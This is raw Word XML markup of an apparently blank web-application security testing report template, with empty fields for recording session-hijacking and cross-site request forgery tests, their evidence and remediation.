w:rsidRDefault="008A7D07" w:rsidP="008A7D0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420AE" w:rsidRPr="00CA2680" w14:paraId="01D03507" w14:textId="77777777" w:rsidTr="0000485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F27C04A" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="0000485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A2680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308DB47" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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5D1317F" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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564B4E6" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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37C9447" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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D512E86" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420AE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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E72B681" w14:textId="77777777" w:rsidR="007420AE" w:rsidRPr="00CA2680" w:rsidRDefault="007420AE" w:rsidP="007420A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3C85C517" w14:textId="77777777" w:rsidR="006A3CD2" w:rsidRPr="00A51A96" w:rsidRDefault="006A3CD2" w:rsidP="006A3CD2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A3CD2" w14:paraId="767C4165" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72E6DA32" w14:textId="77777777" w:rsidR="006A3CD2" w:rsidRDefault="006A3CD2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D4D9E03" w14:textId="77777777" w:rsidR="006A3CD2" w:rsidRDefault="006A3CD2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45B397A8" w14:textId="77777777" w:rsidR="006A3CD2" w:rsidRDefault="006A3CD2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15CDD536" w14:textId="77777777" w:rsidR="006A3CD2" w:rsidRDefault="006A3CD2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14792F8B" w14:textId="77777777" w:rsidR="006A3CD2" w:rsidRDefault="006A3CD2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0821A072" w14:textId="77777777" w:rsidR="006A3CD2" w:rsidRDefault="006A3CD2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CE34EFD" w14:textId="77777777" w:rsidR="006A3CD2" w:rsidRDefault="006A3CD2" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D14EAB1" w14:textId="77777777" w:rsidR="00004856" w:rsidRDefault="00004856" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A6D39C8" w14:textId="77777777" w:rsidR="001076D3" w:rsidRDefault="001076D3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6A3CD2" w:rsidRPr="00A51A96" w14:paraId="538C6E65" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2151A0A4" w14:textId="4BBFE6F1" w:rsidR="006A3CD2" w:rsidRPr="003C713F" w:rsidRDefault="006A3CD2" w:rsidP="00725128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5.7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E51D0A" w:rsidRPr="00E51D0A">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Session Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BE6A589" w14:textId="53C71109" w:rsidR="006A3CD2" w:rsidRPr="003C36D6" w:rsidRDefault="006A3CD2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10653E" w:rsidRPr="0010653E" w14:paraId="1F66996B" w14:textId="77777777" w:rsidTr="003C36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B7001AA" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="003C36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0653E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2FC982C" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653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0653E" w:rsidRPr="0010653E" w14:paraId="327BC851" w14:textId="77777777" w:rsidTr="003C36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E1851A6" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="003C36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0653E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601147D" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653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0653E" w:rsidRPr="0010653E" w14:paraId="3AB3AC07" w14:textId="77777777" w:rsidTr="003C36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1C09B26" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="003C36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0653E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50CE4D5" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653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0653E" w:rsidRPr="0010653E" w14:paraId="705D9C96" w14:textId="77777777" w:rsidTr="003C36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9DB4A8F" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="003C36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0653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Target User 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CC80467" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653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97756" w:rsidRPr="00CA2680" w14:paraId="72D95702" w14:textId="77777777" w:rsidTr="003C36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7954BB7" w14:textId="77777777" w:rsidR="00797756" w:rsidRPr="00CA2680" w:rsidRDefault="00797756" w:rsidP="003C36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Attack Performed?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5866E04" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756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13774AE" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756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7842057" w14:textId="77777777" w:rsidR="00797756" w:rsidRPr="00CA2680" w:rsidRDefault="00797756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97756" w14:paraId="0529B23B" w14:textId="77777777" w:rsidTr="003C36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6EBEAC7" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756" w:rsidP="003C36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Approach Followed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39AA24A" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756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E50F476" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756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60365CF" w14:textId="77777777" w:rsidR="003C36D6" w:rsidRDefault="003C36D6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86C7B3C" w14:textId="77777777" w:rsidR="003C36D6" w:rsidRDefault="003C36D6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2BF04D8" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756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97756" w14:paraId="40B03A58" w14:textId="77777777" w:rsidTr="003C36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BA73A28" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756" w:rsidP="003C36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Is the Attack Successful?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496ED743" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756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7420AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:kern w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="00905692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3C45112A" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756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7420AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:kern w:val="0"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r w:rsidRPr="00905692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797756" w:rsidRPr="008A7D07" w14:paraId="3C4258AE" w14:textId="77777777" w:rsidTr="003C36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3BB23C0" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756" w:rsidP="003C36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Evidence Collected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7D575829" w14:textId="77777777" w:rsidR="00797756" w:rsidRPr="008A7D07" w:rsidRDefault="00797756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Times New Roman" w:cs="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A7D07">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ADE0DD0" w14:textId="77777777" w:rsidR="00797756" w:rsidRDefault="00797756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Times New Roman" w:cs="Calibri"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53C4B436" w14:textId="77777777" w:rsidR="00797756" w:rsidRPr="008A7D07" w:rsidRDefault="00797756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Times New Roman" w:cs="Calibri"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0010653E" w:rsidRPr="0010653E" w14:paraId="3B50A53A" w14:textId="77777777" w:rsidTr="003C36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24D1709" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="003C36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10653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Hijacked Session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4C97BA3" w14:textId="77777777" w:rsidR="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653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2798783" w14:textId="77777777" w:rsidR="00EC4C25" w:rsidRPr="0010653E" w:rsidRDefault="00EC4C25" w:rsidP="0010653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0653E" w:rsidRPr="0010653E" w14:paraId="5CE7B21E" w14:textId="77777777" w:rsidTr="003C36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FDF66A2" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="003C36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10653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Test Results of Session Hijacking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871100B" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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48162DF" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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2BAB590" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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FD44A1F" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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E2C8E5C" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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E5E2614" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653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C4C25" w:rsidRPr="00CA2680" w14:paraId="4B2AF409" w14:textId="77777777" w:rsidTr="003C36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66479E7" w14:textId="77777777" w:rsidR="00EC4C25" w:rsidRPr="00CA2680" w:rsidRDefault="00EC4C25" w:rsidP="003C36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Remediation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7A539CE" w14:textId="77777777" w:rsidR="00EC4C25" w:rsidRDefault="00EC4C25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8A77816" w14:textId="77777777" w:rsidR="00EC4C25" w:rsidRDefault="00EC4C25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35CAD8D" w14:textId="77777777" w:rsidR="003C36D6" w:rsidRDefault="003C36D6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26B8F67" w14:textId="77777777" w:rsidR="003C36D6" w:rsidRDefault="003C36D6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BB6E58B" w14:textId="77777777" w:rsidR="00EC4C25" w:rsidRDefault="00EC4C25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290E195" w14:textId="77777777" w:rsidR="00EC4C25" w:rsidRPr="00CA2680" w:rsidRDefault="00EC4C25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0653E" w:rsidRPr="0010653E" w14:paraId="19BB0E1E" w14:textId="77777777" w:rsidTr="003C36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FA91578" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="003C36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0653E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4A97E00" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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553A4F0" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="86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4EB43FB" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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09BE840" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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829A0A9" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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0056330" w14:textId="77777777" w:rsidR="0010653E" w:rsidRPr="0010653E" w:rsidRDefault="0010653E" w:rsidP="0010653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2219A14D" w14:textId="77777777" w:rsidR="00EF0BF7" w:rsidRPr="00A51A96" w:rsidRDefault="00EF0BF7" w:rsidP="00EF0BF7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0BF7" w14:paraId="681D1C68" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C4DD592" w14:textId="77777777" w:rsidR="00EF0BF7" w:rsidRDefault="00EF0BF7" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="610730A2" w14:textId="77777777" w:rsidR="00EF0BF7" w:rsidRDefault="00EF0BF7" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6BE19496" w14:textId="77777777" w:rsidR="00EF0BF7" w:rsidRDefault="00EF0BF7" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="480E213F" w14:textId="77777777" w:rsidR="00EF0BF7" w:rsidRDefault="00EF0BF7" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="611E574F" w14:textId="77777777" w:rsidR="00EF0BF7" w:rsidRDefault="00EF0BF7" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64086157" w14:textId="77777777" w:rsidR="00EF0BF7" w:rsidRDefault="00EF0BF7" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6487A0AF" w14:textId="77777777" w:rsidR="003C36D6" w:rsidRDefault="003C36D6" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3929C83A" w14:textId="77777777" w:rsidR="003C36D6" w:rsidRDefault="003C36D6" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="308B392C" w14:textId="77777777" w:rsidR="00EF0BF7" w:rsidRDefault="00EF0BF7" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EE137D4" w14:textId="77777777" w:rsidR="00E51D0A" w:rsidRDefault="00E51D0A" w:rsidP="000947B4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7771DC" w:rsidRPr="00A51A96" w14:paraId="58B4BEE1" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6A4E4B89" w14:textId="44FD4DEC" w:rsidR="007771DC" w:rsidRPr="003C713F" w:rsidRDefault="007771DC" w:rsidP="00725128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5.</w:t>
            </w:r>
            <w:r w:rsidR="00D6515F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>8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07090A" w:rsidRPr="0007090A">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check for Cross-Site Request Forgery (XSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17FE3F7A" w14:textId="77777777" w:rsidR="00D13A37" w:rsidRPr="003C36D6" w:rsidRDefault="00D13A37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451"/>
        <w:gridCol w:w="3555"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w14:paraId="242BEA2B" w14:textId="77777777" w:rsidTr="00F74C2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B41AE0C" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="00F74C2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E4EF4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1BEEA36" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF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E4EF4" w:rsidRPr="007E4EF4" w14:paraId="6DB48BBD" w14:textId="77777777" w:rsidTr="00F74C2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3C33136" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="00F74C2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E4EF4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243CA4C" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF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E4EF4" w:rsidRPr="007E4EF4" w14:paraId="03ABAB65" w14:textId="77777777" w:rsidTr="00F74C2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261D276" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="00F74C2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E4EF4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DD3DBFF" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF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E4EF4" w:rsidRPr="007E4EF4" w14:paraId="33127939" w14:textId="77777777" w:rsidTr="00F74C2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BDAE86D" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="00F74C2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E4EF4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Methods Used for Transmitting Session Tokens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8139A47" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF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E4EF4" w:rsidRPr="007E4EF4" w14:paraId="3D5757EE" w14:textId="77777777" w:rsidTr="00F74C2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6C15AF8" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="00F74C2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E4EF4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Key Functionality of the Application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2CBBF13" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="87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D6E13B7" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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2F74F31" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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4A5BA14" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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4E082B6" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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4034ABE" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF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E4EF4" w:rsidRPr="007E4EF4" w14:paraId="0E1DF4B5" w14:textId="77777777" w:rsidTr="00F74C2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AD51782" w14:textId="421DBAA9" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="00196C24" w:rsidP="00F74C2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bookmarkStart w:id="7" w:name="_Hlk189145930"/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Attack Performed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3459E3D" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF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BF3AC18" w14:textId="77777777" w:rsidR="00196C24" w:rsidRPr="007E4EF4" w:rsidRDefault="00196C24" w:rsidP="007E4EF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96C24" w:rsidRPr="007E4EF4" w14:paraId="1BC4D02E" w14:textId="77777777" w:rsidTr="00F74C2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7EC4960" w14:textId="2D2128D0" w:rsidR="00196C24" w:rsidRPr="007E4EF4" w:rsidRDefault="00196C24" w:rsidP="00F74C2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E4EF4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Techniques Used to Check XSRF Vulnerabilities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EC7A2FF" w14:textId="77777777" w:rsidR="00196C24" w:rsidRPr="007E4EF4" w:rsidRDefault="00196C24" w:rsidP="007E4EF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E4EF4" w:rsidRPr="007E4EF4" w14:paraId="52A496B3" w14:textId="77777777" w:rsidTr="00F74C2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E416B05" w14:textId="5E0D05DC" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="00A71265" w:rsidP="00F74C2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Is the Attack Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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EB35930" w14:textId="37F96D34" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="00A71265" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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55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1714D05" w14:textId="6CE88542" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="00A71265" w:rsidP="007E4EF4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F40191" w:rsidRPr="007E4EF4" w14:paraId="10DADF1A" w14:textId="77777777" w:rsidTr="00F74C2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41CDE32" w14:textId="2DB85847" w:rsidR="00F40191" w:rsidRDefault="00F40191" w:rsidP="00F74C2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Evidence Collected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00F3C39F" w14:textId="77777777" w:rsidR="00F40191" w:rsidRPr="00F40191" w:rsidRDefault="00F40191" w:rsidP="00F40191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F40191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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74AC4B8A" w14:textId="31D9AAB2" w:rsidR="00F40191" w:rsidRDefault="00F40191" w:rsidP="00F40191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bookmarkEnd w:id="7"/>
      <w:tr w:rsidR="004405D4" w:rsidRPr="007E4EF4" w14:paraId="0660BC46" w14:textId="77777777" w:rsidTr="00F74C2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2470AF4" w14:textId="0838A83B" w:rsidR="004405D4" w:rsidRPr="007E4EF4" w:rsidRDefault="004405D4" w:rsidP="00F74C2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E4EF4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Application Uses </w:t>
            </w:r>
            <w:r w:rsidRPr="007E4EF4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AJAX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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A7C0044" w14:textId="009A9BFB" w:rsidR="004405D4" w:rsidRPr="007E4EF4" w:rsidRDefault="004405D4" w:rsidP="004405D4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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7E4EF4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55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2231170" w14:textId="465E96AB" w:rsidR="004405D4" w:rsidRPr="007E4EF4" w:rsidRDefault="004405D4" w:rsidP="004405D4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7E4EF4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7E4EF4" w:rsidRPr="007E4EF4" w14:paraId="3E958971" w14:textId="77777777" w:rsidTr="00F74C2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F3641B9" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="00F74C2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E4EF4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Instances for JSON Hijacking Vulnerabilities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F8410E1" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="89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88843D4" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="89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E9F0FC8" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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72D378F" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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CB942DC" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8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A46F0EC" w14:textId="77777777" w:rsidR="007E4EF4" w:rsidRPr="007E4EF4" w:rsidRDefault="007E4EF4" w:rsidP="007E4EF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A15BE" w:rsidRPr="007E4EF4" w14:paraId="6C1093FE" w14:textId="77777777" w:rsidTr="00F74C2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4DD1A44" w14:textId="7EE3050B" w:rsidR="00CA15BE" w:rsidRPr="007E4EF4" w:rsidRDefault="00CA15BE" w:rsidP="00F74C2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A15BE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Forms &amp; State-Changing Actions Identified?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8A10511" w14:textId="77777777" w:rsidR="00CA15BE" w:rsidRDefault="00CA15BE" w:rsidP="00CA15B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D4527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D4527F" w:rsidRPr="00D4527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List if applicable</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4527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07925FC" w14:textId="77777777" w:rsidR="00D4527F" w:rsidRDefault="00D4527F" w:rsidP="00CA15B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1455667" w14:textId="1A31295F" w:rsidR="00D4527F" w:rsidRPr="00D4527F" w:rsidRDefault="00D4527F" w:rsidP="00CA15B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4527F" w:rsidRPr="007E4EF4" w14:paraId="29553D85" w14:textId="77777777" w:rsidTr="00F74C2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6D12773" w14:textId="347947BB" w:rsidR="00D4527F" w:rsidRPr="00CA15BE" w:rsidRDefault="00E92518" w:rsidP="00F74C2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92518">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
